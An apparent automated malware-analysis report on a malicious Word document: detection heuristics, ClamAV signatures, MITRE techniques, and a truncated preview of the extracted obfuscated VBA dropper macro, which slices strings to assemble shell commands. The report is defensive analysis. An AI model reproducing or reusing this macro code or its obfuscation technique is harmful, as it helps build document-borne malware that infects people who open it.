MALICIOUS
302
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1204.002 Malicious File
The sample is a malicious Office document containing a VBA macro. The macro uses the Shell() function, a critical heuristic firing, indicating an attempt to execute arbitrary commands. This is further supported by the 'OLE_VBA_PCODE_AUTOEXEC_EXEC' heuristic, which flags auto-execution combined with execution tokens. The ClamAV detections 'Img.Dropper.PhishingLure-6443153-0' and 'Doc.Trojan.Obfuscated-6443078-0' confirm its malicious nature, suggesting it acts as a dropper for other malware.
Heuristics 7
-
ClamAV: Img.Dropper.PhishingLure-6443153-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Img.Dropper.PhishingLure-6443153-0
-
VBA macros detected medium 3 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Shell() call in VBA critical OLE_VBA_SHELLShell() call in VBA
-
AutoOpen macro high OLE_VBA_AUTOOPENAutoOpen macro
-
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 80504 bytes |
SHA-256: d90155808ced037f6784b3c18ab2723cfb188f5bd1544cdbc72e1f0bbc582ee5 |
|||
|
Detection
ClamAV:
Doc.Trojan.Obfuscated-6443078-0
Obfuscation or payload:
unlikely
|
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "iwlQGUsNRYV"
Function NpYmCPnj()
On Error Resume Next
wXqrIlbTwzH = ("dbFrvOZsqtYQzIcpHiUuHpNnAScfaFHa")
JDiQDYt = 3901150 - Sqr(PIVZCXZCPH * Fix(iRZtXYLi) + 2575741 / wAOpXqrBvOGSXV) - 193789 * knTLTHw * sZfizrZzG + CDbl(4469393 * Int(3374510) / 1548307 * Tan(1258663)) / ijhBUtFPtDsS / CByte(7658098 - CDbl(KCfqCvwwLM))
wrVGHtL = 392228 - Sqr(pJLADsw * Fix(ImdSnFN) + 5611619 / bljEAmEraGK) - 7566441 * VVzQDwDtAzT * PXYNDwhTSjaVz + CDbl(7872812 * Int(4321388) / 1352029 * Tan(1748112)) / mnNcRISWCRZ / CByte(7473941 - CDbl(mMRlPjdWJdT))
ZjWKVC = Mid(wXqrIlbTwzH, 19, 10)
VoWPWzqS = ("BdwifswrzhuwnHcw%=o^we^ruEGTCcS")
LRMvpKfV = 3173662 - Sqr(zUjCGTVdZ * Fix(wnpKLajM) + 5296960 / JoIFZrts) - 1024362 * KHAWYMrXwn * czKiRZRf + CDbl(6015003 * Int(2787467) / 9725554 * Tan(4173306)) / DJLbdPZ / CByte(5696643 - CDbl(EwrmTmziLP))
CvFrX = 7665064 - Sqr(hpwaHRb * Fix(aGMlzSOA) + 3128647 / hNdEvNniGfjwDi) - 6508242 * WUNAVzwRzzjFpB * wSQiaccukn + CDbl(5687520 * Int(2156340) / 9211620 * Tan(6105600)) / DdDzvunPYjP / CByte(2291249 - CDbl(zdhoFIhi))
XOfKzCz = Mid(VoWPWzqS, 15, 10)
cAPbjQCY = ("HnjEwljLVvfGHh%=p&&set %YLtiJsiIBWvimjzpUAsvDD")
uFDkNMjzw = 6775563 - Sqr(jaqGHbWWawbcq * Fix(zdQzmQatZnuXV) + 5621436 / AzMpkmfNaHLz) - 1191711 * HjcQMBh * ADSTqBCLkGtn + CDbl(5072756 * Int(9946815) / 2829255 * Tan(7357068)) / CSQqqbRT / CByte(8125408 - CDbl(ESGJbBPzJ))
qPKKMcFtcSk = 4426253 - Sqr(vdKOWFFSc * Fix(UqKJjQuJ) + 5531482 / zAjztdz) - 3441630 * LAFPpHoFcTVL * NKkbwzr + CDbl(7109558 * Int(4009219) / 8030603 * Tan(6207837)) / RvtNVtHnfR / CByte(1325693 - CDbl(bUCvKSpGp))
kAGGDYnUvZn = Mid(cAPbjQCY, 12, 13)
MDmTPnopOkV = ("HJcMbLEQaNH%=DwEEILqvzjsWp")
Zzvhj = 9657470 - Sqr(mJKkDnlp * Fix(roaaHCoGkW) + 2808169 / zYsjTwZS) - 9696791 * jckQDtZoj * pwoSWhjjsI + CDbl(1312347 * Int(9277866) / 6849307 * Tan(9021513)) / lRDjrMWViFzpr / CByte(9724962 - CDbl(jwpsWwjaKmNqZq))
uBzhzXnfwv = 1189119 - Sqr(spaScWEpJTdKN * Fix(rrkwbKGrYr) + 312618 / swdVzfYRFzQfR) - 2050011 * AiDVZNmvVFaPw * BRjQmdILnVzl + CDbl(9143964 * Int(3661145) / 8444850 * Tan(5224299)) / hQSGIUV / CByte(5421918 - CDbl(GBHQWQckDij))
nwNHCmtczlT = Mid(MDmTPnopOkV, 9, 5)
YLSwHizB = ("tsJwhJwzc XzfzdNTTiLiJAGjEwzspd")
tjjPJq = 1662649 - Sqr(QKAEYbPfYF * Fix(qEIKDjFMDkBD) + 206982 / aCZYaVtOKZT) - 1232773 * UYwMrpbpFHquAC * FmPGzZzZpGz + CDbl(7056849 * Int(7711179) / 5346766 * Tan(8890088)) / qzjkoGYJOZpV / CByte(9057843 - CDbl(iaSPJYJNGaWz))
BXoaH = 1283658 - Sqr(tEnNKYA * Fix(QSpwNFsajciGcX) + 3546893 / SVZdqJOpAS) - 3236150 * mcKWjhJA * KKEVjquVAc + CDbl(4129447 * Int(7309616) / 2774208 * Tan(8993175)) / zXGHEAwvohoGR / CByte(1447479 - CDbl(vOSzHLVIKS))
dizRzdh = Mid(YLSwHizB, 10, 14)
hBpVwzBFD = ("ulvfcndJSkSaNMRjitEtvamz=^he^l^l&&set VErpT")
lVEEpiS = 1097714 - Sqr(YczFFHiEqNpwKh * Fix(mjrqYJdDvtGU) + 619019 / VDAHSUmM) - 3228973 * TjcmFXwnGK * oCnhjvYBMwmauV + CDbl(1916585 * Int(7874749) / 8297249 * Tan(8531760)) / uZTSWrhqz / CByte(4604296 - CDbl(TNsOhAMaiYNKEa))
NbXLbHFWs = 6346009 - Sqr(hRviFut * Fix(WVkRpCEbd) + 2914176 / ZijnJcQKohO) - 2763134 * pmAYCprYUcrMQ * kjUmjpvHWAimGo + CDbl(7077232 * Int(1075525) / 6706735 * Tan(1443572)) / rcDCfZoX / CByte(1097721 - CDbl(Gobthjd))
hCJPO = Mid(hBpVwzBFD, 25, 14)
REBOJpF = ("wnnlIuwbLZDqmjiznczXOTwhRZITpUjB")
lcaHNpTi = 3117930 - Sqr(muXkNHtwrrHYb * Fix(BHhRuiLzAoZ) + 4392770 / ZwnGCKLRsbnzwO) - 6569997 * SAiicjTHwvlj * uiKqITCElENQM + CDbl(1627227 * Int(6125031) / 8825598 * Tan(3619199)) / QdQhnqsWqcfHGZ / CByte(5954376 - CDbl(wtcIoufchwV))
wwSHvjSRp = 2694766 - Sqr(anNjwVCXM * Fix(UwmdZYdzoljJmR) + 2004704 / VzoArViF) - 2998920 * SbIEcElzIKCRG * DwhcjRB + CDbl(9368245 * Int(4181731) / 8055762 * Tan(9919517)) / jMDwTjN / CByte(7138529 - CDbl(CpjJfXo))
HwdzqbZbv = Mid(REBOJpF, 4, 10)
cwKTwh
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.